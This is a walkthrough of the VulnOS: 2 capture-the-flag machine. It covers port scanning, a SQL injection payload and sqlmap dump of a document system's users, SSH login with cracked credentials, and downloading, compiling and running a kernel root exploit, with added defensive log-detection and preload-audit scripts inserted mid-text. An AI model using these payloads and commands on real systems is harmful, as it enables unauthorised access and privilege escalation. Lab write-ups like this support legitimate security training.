VulnOS: 2 Walkthrough

VulnOS: 2 is a boot to root virtual machine which is hosted on Vulnhub.

Description of the challenge
VulnOS are a series of vulnerable operating systems packed as virtual images to enhance penetration testing skills
This is version 2 -
Smaller, less chaotic !
As time is not always on my side, it took a long time to create another VulnOS. But I like creating them. The image is built with VBOX. Unpack the file and add it to your virtualisation software.
Your assignment is to pentest a company website, get root of the system and read the final flag
NOTE: the current keyboard preference is BE. “pentesting is a wide concept”
If you have questions, feel free to contact me on m4db33f@gmail dot com. Shout out to the Vulnhub Testing team!
Hope you enjoy.

Identify the IP address of VulnOS machine
Nmap Ping Scan

root@kali:~# nmap -sn 192.168.1.1/24
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-19 12:31 EDT
Nmap scan report for 192.168.1.1
Host is up (0.036s latency).
MAC Address: A0:63:91:F0:CC:4B (Netgear)
Nmap scan report for 192.168.1.4
Host is up (0.19s latency).
MAC Address: B4:4B:D2:8C:6F:38 (Apple)
Nmap scan report for 192.168.1.7
Host is up (0.20s latency).
MAC Address: 70:77:81:C0:6C:33 (Hon Hai Precision Ind.)
Nmap scan report for 192.168.1.11
Host is up (0.00011s latency).
MAC Address: F4:0F:24:33:5E:D1 (Apple)
Nmap scan report for 192.168.1.13
Host is up (0.16s latency).
MAC Address: 68:37:E9:88:16:5F (Amazon Technologies)
Nmap scan report for 192.168.1.42
Host is up (0.00036s latency).
MAC Address: 08:00:27:F9:DD:0B (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.1.34
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 9.22 seconds
root@kali:~#

Identify services running on VulnOS

root@kali:~# nmap -sT -sV -A -O -v -p 1-65535 192.168.1.42
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-19 12:32 EDT
NSE: Loaded 143 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:32
Completed NSE at 12:32, 0.00s elapsed
Initiating NSE at 12:32
Completed NSE at 12:32, 0.00s elapsed
Initiating ARP Ping Scan at 12:32
Scanning 192.168.1.42 [1 port]
Completed ARP Ping Scan at 12:32, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:32
Completed Parallel DNS resolution of 1 host. at 12:32, 0.01s elapsed
Initiating Connect Scan at 12:32
Scanning 192.168.1.42 [65535 ports]
Discovered open port 80/tcp on 192.168.1.42
Discovered open port 22/tcp on 192.168.1.42
Discovered open port 6667/tcp on 192.168.1.42
Completed Connect Scan at 12:32, 2.82s elapsed (65535 total ports)
Initiating Service scan at 12:32
Scanning 3 services on 192.168.1.42
Completed Service scan at 12:32, 11.05s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.42
NSE: Script scanning 192.168.1.42.
Initiating NSE at 12:32
Completed NSE at 12:33, 60.16s elapsed
Initiating NSE at 12:33
Completed NSE at 12:33, 0.01s elapsed
Nmap scan report for 192.168.1.42
Host is up (0.00041s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
| 2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
|_ 256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open irc ngircd
MAC Address: 08:00:27:F9:DD:0B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Uptime guess: 198.047 days (since Wed Nov 2 11:24:59 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.41 ms 192.168.1.42
NSE: Script Post-scanning.
Initiating NSE at 12:33
Completed NSE at 12:33, 0.00s elapsed
Initiating NSE at 12:33
Completed NSE at 12:33, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.47 seconds
Raw packets sent: 23 (1.806KB) | Rcvd: 16 (1.330KB)
root@kali:~#

Port 80 — Enumerating http Apache httpd 2.4.7 ((Ubuntu))

Opening up the URL in the browser.

Let's follow the hyperlink on the page. We are presented with another website.

The documentation tab gives away some information about a new site and its credentials.

Browsing to the above-mentioned folder, we reach a new page which gives away the version of the document management system.

Let's search for relevant exploits.

The exploit states that the odm_user parameter is vulnerable to SQL injection.

http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9

Running sqlmap to exploit the injection and enumerate the admin credentials.

root@kali:~# sqlmap -u "http://192.168.1.42/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --level=5 --risk=3
Output:
available databases [6]:
[*] drupal7
[*] information_schema
[*] jabcd0cs
[*] mysql
[*] performance_schema
[*] phpmyadmin
root@kali:~# sqlmap -u "http://192.168.1.42/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables
Output:
Database: jabcd0cs
[15 tables]
+-------------------+
| odm_access_log |
| odm_admin |
| odm_category |
| odm_data |
| odm_department |
| odm_dept_perms |
| odm_dept_reviewer |
| odm_filetypes |
| odm_log |
| odm_odmsys |
| odm_rights |
| odm_settings |
| odm_udf |
| odm_user |
| odm_user_perms |
+-------------------+
root@kali:~# sqlmap -u "http://192.168.1.42/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump
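From the defender's side, the injection above and the sqlmap run that follows it both leave an obvious trail in the Apache access log. The following Python script is an added example (not part of the walkthrough or of the document management system) that scans constructed combined-format log lines for requests to ajax_udf.php whose add_value parameter is not a bare column name, or that arrive with sqlmap's User-Agent; the log lines, timestamps and the sqlmap User-Agent string are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed Apache combined-format log lines (not from the walkthrough): a
# legitimate ajax_udf.php request, the UNION-based injection quoted above, a
# quote probe sent with sqlmap's User-Agent, and an unrelated page view.
SAMPLE_LOG = """\
192.168.1.34 - - [19/May/2017:12:40:01 +0200] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.34 - - [19/May/2017:12:41:13 +0200] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9 HTTP/1.1" 200 640 "-" "Mozilla/5.0"
192.168.1.34 - - [19/May/2017:12:45:30 +0200] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%27 HTTP/1.1" 500 0 "-" "sqlmap/1.1 (http://sqlmap.org)"
192.168.1.34 - - [19/May/2017:12:46:02 +0200] "GET /jabcd0cs/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# ajax_udf.php expects add_value to be a bare column name such as odm_user ...
IDENT_RE = re.compile(r'^[A-Za-z0-9_]+$')
# ... so SQL keywords, comment markers, quotes and parentheses never belong there.
SQL_TOKEN_RE = re.compile(r'\b(union|select|sleep|benchmark)\b|--|/\*|#|["\'();]', re.I)


def analyse_request(target, user_agent):
    """Return reasons a request looks like an attack on ajax_udf.php ([] if none)."""
    reasons = []
    if "sqlmap" in user_agent.lower():
        reasons.append("sqlmap user-agent")
    url = urlparse(target)
    if url.path.endswith("/ajax_udf.php"):
        # parse_qs percent-decodes, so %20UNION%20 is seen as a plain UNION token.
        for value in parse_qs(url.query, keep_blank_values=True).get("add_value", []):
            if not IDENT_RE.match(value):
                reasons.append("add_value is not a bare column name: %r" % value)
            if SQL_TOKEN_RE.search(value):
                reasons.append("SQL tokens in add_value: %r" % value)
    return reasons


def scan_log(text):
    """Return (client_ip, timestamp, reasons) for every suspicious access-log line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a production tool would count these
        reasons = analyse_request(m.group("target"), m.group("ua"))
        if reasons:
            hits.append((m.group("ip"), m.group("ts"), reasons))
    return hits
```

Running scan_log(SAMPLE_LOG) flags the second and third lines only; the same allow-list check (bare identifier or reject) is what the PHP side should apply to add_value before it reaches the query.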

Let's try to crack webmin's credentials.

Username : webmin
Password : webmin1980

Let's log in to the machine.

root@kali:~# ssh webmin@192.168.1.42
The authenticity of host '192.168.1.42 (192.168.1.42)' can't be established.
ECDSA key fingerprint is SHA256:nIyyJRPJMy1g6F5m8AIT7W//x6lj3ZqhUbYuvSafKeI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.42' (ECDSA) to the list of known hosts.
webmin@192.168.1.42's password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)
* Documentation:  https://help.ubuntu.com/
System information as of Fri May 19 18:30:25 CEST 2017
System load: 0.0               Memory usage: 5%   Processes:       62
Usage of /: 5.7% of 29.91GB Swap usage: 0% Users logged in: 0
Graph this data and manage this system at:
https://landscape.canonical.com/
Last login: Wed May  4 10:41:07 2016
$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)

Privilege Escalation

$ python -c 'import pty;pty.spawn("/bin/bash")'
webmin@VulnOSv2:~$ uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux
webmin@VulnOSv2:~$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.4 LTS"
webmin@VulnOSv2:~$ file /bin/ls
/bin/ls: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=cecbb9e27978d91bc6fe2cc4d46d0cd58deafdb2, stripped
webmin@VulnOSv2:~$

Searching for privilege escalation exploits using the information gathered.

Let's root the server.

webmin@VulnOSv2:~$ cd /tmp
webmin@VulnOSv2:/tmp$ wget https://www.exploit-db.com/download/37292
--2017-05-19 20:06:06-- https://www.exploit-db.com/download/37292
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [application/txt]
Saving to: ‘37292’
100%[======================================>] 5,123       --.-K/s   in 0s
2017-05-19 20:06:07 (38.5 MB/s) - ‘37292’ saved [5123/5123]
webmin@VulnOSv2:/tmp$ ls
37292
webmin@VulnOSv2:/tmp$ mv 37292 ofs.c
webmin@VulnOSv2:/tmp$ gcc ofs.c -o ofs
webmin@VulnOSv2:/tmp$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)
webmin@VulnOSv2:/tmp$ ./ofs

spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)

# cat /root/flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.
What do you think of A.I.?
#
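The exploit output above shows the one artefact this technique leaves on disk: it creates /etc/ld.so.preload, a file that does not exist on a default Ubuntu install, and points it at a freshly built shared library. The Python audit below is an added example, not part of the walkthrough: audit_preload() reports the file's presence and checks each library it names for a trusted location, existence, ownership and write permissions, and demo_findings() builds a constructed fixture in a temporary directory (the library name ofs.so and its contents are made up for the example) so the check can be run without touching the real system.

```python
import os
import stat
import tempfile

# Directories a preload entry is expected to point into on an Ubuntu host; a
# library anywhere else (/tmp, /dev/shm, a home directory) is worth a look.
TRUSTED_LIB_DIRS = ("/lib", "/lib32", "/lib64", "/usr/lib", "/usr/lib32",
                    "/usr/lib64", "/usr/local/lib")


def audit_preload(preload_path="/etc/ld.so.preload"):
    """Return findings about a preload file; [] means nothing to report."""
    findings = []
    if not os.path.exists(preload_path):
        return findings
    # The file is absent on a default install, so its presence alone is a finding.
    findings.append("%s exists (absent on a default install)" % preload_path)
    with open(preload_path) as fh:
        libs = [l.strip() for l in fh if l.strip() and not l.startswith("#")]
    for lib in libs:
        if not any(lib.startswith(d + "/") for d in TRUSTED_LIB_DIRS):
            findings.append("library outside trusted directories: %s" % lib)
        if not os.path.isfile(lib):
            findings.append("preloaded library missing on disk: %s" % lib)
            continue
        st = os.stat(lib)
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append("library is group/world writable: %s" % lib)
        if st.st_uid != 0:
            findings.append("library not owned by root: %s" % lib)
    return findings


def demo_findings():
    """Audit a constructed fixture resembling the exploit's leftovers."""
    tmp = tempfile.mkdtemp()
    lib = os.path.join(tmp, "ofs.so")      # constructed name, not the exploit's
    with open(lib, "w") as fh:
        fh.write("not really an ELF\n")
    os.chmod(lib, 0o666)                   # world-writable, as dropped files often are
    preload = os.path.join(tmp, "ld.so.preload")
    with open(preload, "w") as fh:
        fh.write("# constructed sample\n%s\n" % lib)
    return audit_preload(preload)


if __name__ == "__main__":
    for finding in audit_preload() or ["no /etc/ld.so.preload present"]:
        print(finding)
```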

Happy Hacking !!!
